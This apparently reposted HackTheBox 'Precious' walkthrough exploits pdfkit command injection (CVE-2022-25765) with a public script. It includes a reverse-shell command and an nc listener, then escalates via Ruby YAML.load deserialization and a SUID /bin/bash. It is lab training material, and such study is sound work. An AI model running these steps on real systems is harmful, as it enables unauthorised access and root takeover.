htb_precious

admin
admin
admin
138658
文章
114
评论
2024年2月6日08:44:58评论33 views字数 1828阅读6分5秒阅读模式

information gathering

use nmap to discover open-ports and services:

htb_precious

Now we focus on its http service on port 80.

Access it by firefox browser(remember to modify your /etc/hosts):

htb_precious

It seems that this website would help us convert web page to a pdf file. I tried aaa in the search bar:

htb_precious

I was reminded to provide a valid url. Naturally i think of starting a http-server on my kali and then entering my server address :

htb_precious

As excepted, a pdf was downloaded to my own machine. We can obviously find some familiar files by clicking it.

At this time all i can access is a pdf , as a result i use exiftool to analyse it.

htb_precious

What inspires me is pdfkit v0.8.6. I tried searchsploit subconsciously but found nothing:

htb_precious

Then i turned to google , finding a command injection vulnerability:

htb_precious

After trying several pocs, i found a python exp[nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765: Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 (github.com)[1]]:

step 1:

starting a python simple http-server:

htb_precious

step 2:

nc:

htb_precious

step 3:

python CVE-2022-25765.py -t target -a localhost -p localport:

htb_precious

foothold

now we got a shell after exploit:

htb_precious

By following below steps , i finally access a fully interactive shell:

1.open a bash terminal2.nc -nlvp 44443.ctrl+z to background the job4.stty -echo raw5.fg

htb_precious

I found a secret directory in home path after looking around:

htb_precious

su henry:

htb_precious

user.txt lies in /home/henry .

privilege escalation

The last step is privilege escalation.

At first , i tried the most simple but effective way:

htb_precious

It appears that henry can run the file update_depencies.rb as root. Use cat to take a look at the file:

htb_precious

I'm stuck with YAML.load , it appears to be vulnerable to a deserialization attack.

Notice that the rb load a file named dependencies.yml. I download malicious yml from google to vefity the vul.

htb_precious

sudo /usr/bin/ruby /opt/update_dependencies.rb:

htb_precious

It works!

Try to add suid to /bin/bash:

htb_precious

exploit:

htb_precious

/bin/bash -p:

htb_precious

References

[1] nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765: Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 (github.com): https://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765

原文始发于微信公众号(Crush Sec):htb_precious

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月6日08:44:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   htb_precioushttps://cn-sec.com/archives/2472290.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息